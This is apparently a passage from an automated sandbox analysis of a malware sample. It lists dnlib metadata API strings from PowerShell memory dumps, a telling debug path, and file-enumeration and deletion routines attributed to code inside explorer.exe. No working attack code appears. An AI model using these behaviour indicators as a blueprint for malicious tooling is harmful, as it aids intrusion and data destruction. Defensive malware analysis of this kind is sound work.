            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_000C1D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_000C3ED9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_000C2B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
